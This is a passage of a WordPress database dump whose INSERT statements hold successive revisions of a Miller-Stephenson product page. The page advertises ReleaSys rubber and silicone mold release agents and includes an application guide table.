style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-Based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n</tbody>\n</table>\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n[ux_product_categories ids="21" number="10"]\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-autosave-v1', '', '', '2016-11-24 04:08:48', '2016-11-24 04:08:48', '', 2886, 'https://www.miller-stephenson.com/2886-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2894, 3, '2016-11-04 19:24:38', '2016-11-04 19:24:38', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys products are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Low Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table width="720">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3">High-Temperature</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Low Mold Building</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></td>\r\n<td>• Medium Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Instantaneous Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="4" width="122">High Flow Injection Molding</td>\r\n<td style="text-align: center;" rowspan="4">Water-based</td>\r\n<td style="text-align: center;" rowspan="4"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></td>\r\n<td>• High Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Solvent-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></td>\r\n<td>• Maximized Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Highly Filled Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Release most compounds</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></td>\r\n<td>• Multiple releases</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></td>\r\n<td>• Maximized Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:24:38', '2016-11-04 19:24:38', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2895, 3, '2016-11-04 19:27:14', '2016-11-04 19:27:14', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release Agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Low Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table width="720">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3">High-Temperature</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Low Mold Building</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></td>\r\n<td>• Medium Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Instantaneous Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="4" width="122">High Flow Injection Molding</td>\r\n<td style="text-align: center;" rowspan="4">Water-based</td>\r\n<td style="text-align: center;" rowspan="4"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></td>\r\n<td>• High Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Solvent-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></td>\r\n<td>• Maximized Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Highly Filled Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Release most compounds</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></td>\r\n<td>• Multiple releases</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></td>\r\n<td>• Maximized Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:27:14', '2016-11-04 19:27:14', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2896, 0, '2016-11-04 19:28:49', '2016-11-04 19:28:49', '', '', '', 'publish', 'closed', 'closed', '', '2896', '', '', '2016-11-04 19:28:49', '2016-11-04 19:28:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/2896/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2897, 3, '2016-11-04 19:29:10', '2016-11-04 19:29:10', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release Agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Low Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table width="720">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3">High-Temperature</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Low Mold Building</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></td>\r\n<td>• Medium Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Instantaneous Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="4" width="122">High Flow Injection Molding</td>\r\n<td style="text-align: center;" rowspan="4">Water-based</td>\r\n<td style="text-align: center;" rowspan="4"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></td>\r\n<td>• High Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Solvent-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></td>\r\n<td>• Maximized 